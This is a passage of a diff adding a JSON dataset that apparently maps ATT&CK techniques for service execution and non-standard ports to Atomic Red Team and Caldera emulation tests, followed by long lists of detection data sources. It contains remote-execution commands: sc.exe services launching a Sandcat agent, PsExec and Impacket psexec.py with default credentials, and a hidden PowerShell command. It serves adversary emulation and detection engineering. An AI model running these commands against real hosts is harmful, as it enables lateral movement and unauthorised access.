C:\\Users\\Public\\s4ndc4t.exe -server #{server} -v -originLinkID #{origin_link_id}\" displayname= \"Sandcat Execution\";\nsc.exe \\\\#{remote.host.fqdn} start sandsvc;\nStart-Sleep -s 15;\nGet-Process -ComputerName #{remote.host.fqdn} s4ndc4t;\n", + "source": "data/abilities/execution/95727b87-175c-4a69-8c7a-a5d82746a753.yml", + "name": "Create a service named \"sandsvc\" to execute remote 54ndc57 binary named \"s4ndc4t.exe\"" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1569.002", + "display_name": "System Services: Service Execution", + "atomic_tests": [ + { + "name": "Execute a Command as a Service", + "auto_generated_guid": "2382dee2-a75f-49aa-9378-f52df6ed3fb1", + "description": "Creates a service specifying an arbitrary command and executes it. When executing commands such as PowerShell, the service will report that it did not start correctly even when code executes properly.\n\nUpon successful execution, cmd.exe creates a new service using sc.exe that will start powershell.exe to create a new file `art-marker.txt`\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "service_name": { + "description": "Name of service to create", + "type": "String", + "default": "ARTService" + }, + "executable_command": { + "description": "Command to execute as a service", + "type": "String", + "default": "%COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\\art-marker.txt" + } + }, + "executor": { + "command": "sc.exe create #{service_name} binPath= \"#{executable_command}\"\nsc.exe start #{service_name}\nsc.exe delete #{service_name}\n", + "cleanup_command": "del C:\\art-marker.txt >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Use PsExec to execute a command on a remote host", + "auto_generated_guid": "873106b7-cfed-454b-8680-fa9f6400431c", + "description": "Requires having Sysinternals installed, path to sysinternals is one of the input input_arguments\nWill start a process on a remote host.\n\nUpon successful execution, cmd will utilize psexec.exe to spawn calc.exe on a remote endpoint (default:localhost).\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "remote_host": { + "description": "Remote hostname or IP address", + "type": "String", + "default": "localhost" + }, + "user_name": { + "description": "Username", + "type": "String", + "default": "DOMAIN\\Administrator" + }, + "password": { + "description": "Password", + "type": "String", + "default": "P@ssw0rd1" + }, + "psexec_exe": { + "description": "Path to PsExec", + "type": "String", + "default": "C:\\PSTools\\PsExec.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe})\n", + "prereq_command": "if (Test-Path \"#{psexec_exe}\") { exit 0} else { exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://download.sysinternals.com/files/PSTools.zip\" -OutFile \"$env:TEMP\\PsTools.zip\"\nExpand-Archive $env:TEMP\\PsTools.zip $env:TEMP\\PsTools -Force\nNew-Item -ItemType Directory (Split-Path \"#{psexec_exe}\") -Force | Out-Null\nCopy-Item $env:TEMP\\PsTools\\PsExec.exe \"#{psexec_exe}\" -Force\n" + } + ], + "executor": { + "command": "#{psexec_exe} \\\\#{remote_host} -u #{user_name} -p #{password} -accepteula \"C:\\Windows\\System32\\calc.exe\"\n", + "name": "command_prompt" + } + }, + { + "name": "psexec.py (Impacket)", + "auto_generated_guid": "edbcd8c9-3639-4844-afad-455c91e95a35", + "description": "Will execute a command on the remote host with Impacket psexec.py script.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "remote_host": { + "description": "Remote hostname or IP address", + "type": "String", + "default": "127.0.0.1" + }, + "username": { + "description": "Username", + "type": "String", + "default": "Administrator" + }, + "domain": { + "description": "Target domain", + "type": "String", + "default": "" + }, + "password": { + "description": "Password", + "type": "String", + "default": "P@ssw0rd1" + }, + "command": { + "description": "Command to execute in target computer", + "type": "String", + "default": "whoami" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "psexec.py (Impacket)\n", + "prereq_command": "if [ -x \"$(command -v psexec.py)\" ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "sudo pip3 install impacket\n" + } + ], + "executor": { + "command": "psexec.py '#{domain}/#{username}:#{password}@#{remote_host}' '#{command}'\n", + "name": "bash" + } + } + ] + }, + { + "id": "95727b87-175c-4a69-8c7a-a5d82746a753", + "name": "Service Creation", + "description": "Create a service named \"sandsvc\" to execute remote 54ndc57 binary named \"s4ndc4t.exe\"", + "tactic": "execution", + "technique": { + "attack_id": "T1569.002", + "name": "System Services: Service Execution" + }, + "platforms": { + "windows": { + "psh": { + "timeout": 300, + "cleanup": "sc.exe \\\\#{remote.host.fqdn} stop sandsvc;\nsc.exe \\\\#{remote.host.fqdn} delete sandsvc /f;\ntaskkill /s \\\\#{remote.host.fqdn} /FI \"Imagename eq s4ndc4t.exe\"\n", + "command": "sc.exe \\\\#{remote.host.fqdn} create sandsvc start= demand error= ignore binpath= \"cmd /c start C:\\Users\\Public\\s4ndc4t.exe -server #{server} -v -originLinkID #{origin_link_id}\" displayname= \"Sandcat Execution\";\nsc.exe \\\\#{remote.host.fqdn} start sandsvc;\nStart-Sleep -s 15;\nGet-Process -ComputerName #{remote.host.fqdn} s4ndc4t;\n" + } + } + }, + "singleton": true, + "requirements": [ + { + "plugins.stockpile.app.requirements.no_backwards_movement": [ + { + "source": "remote.host.fqdn" + } + ] + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service creation", + "description": "A service/daemon was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "service" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ] + ] + }, + { + "technique_id": "T1571", + "command_list": [ + "Test-NetConnection -ComputerName #{domain} -port 8081\n", + "Test-NetConnection -ComputerName google.com -port #{port}\n", + "telnet #{domain} 8081\n", + "telnet google.com #{port}\n" + ], + "commands": [ + { + "command": "Test-NetConnection -ComputerName #{domain} -port 8081\n", + "source": "atomics/T1571/T1571.yaml", + "name": "Atomic Red Team Test - Non-Standard Port" + }, + { + "command": "Test-NetConnection -ComputerName google.com -port #{port}\n", + "source": "atomics/T1571/T1571.yaml", + "name": "Atomic Red Team Test - Non-Standard Port" + }, + { + "command": "telnet #{domain} 8081\n", + "source": "atomics/T1571/T1571.yaml", + "name": "Atomic Red Team Test - Non-Standard Port" + }, + { + "command": "telnet google.com #{port}\n", + "source": "atomics/T1571/T1571.yaml", + "name": "Atomic Red Team Test - Non-Standard Port" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1571", + "display_name": "Non-Standard Port", + "atomic_tests": [ + { + "name": "Testing usage of uncommonly used port with PowerShell", + "auto_generated_guid": "21fe622f-8e53-4b31-ba83-6d333c2583f4", + "description": "Testing uncommonly used port utilizing PowerShell. APT33 has been known to attempt telnet over port 8081. Upon execution, details about the successful\nport check will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "port": { + "description": "Specify uncommon port number", + "type": "String", + "default": "8081" + }, + "domain": { + "description": "Specify target hostname", + "type": "String", + "default": "google.com" + } + }, + "executor": { + "command": "Test-NetConnection -ComputerName #{domain} -port #{port}\n", + "name": "powershell" + } + }, + { + "name": "Testing usage of uncommonly used port", + "auto_generated_guid": "5db21e1d-dd9c-4a50-b885-b1e748912767", + "description": "Testing uncommonly used port utilizing telnet.\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "port": { + "description": "Specify uncommon port number", + "type": "String", + "default": "8081" + }, + "domain": { + "description": "Specify target hostname", + "type": "String", + "default": "google.com" + } + }, + "executor": { + "command": "telnet #{domain} #{port}\n", + "name": "sh" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + 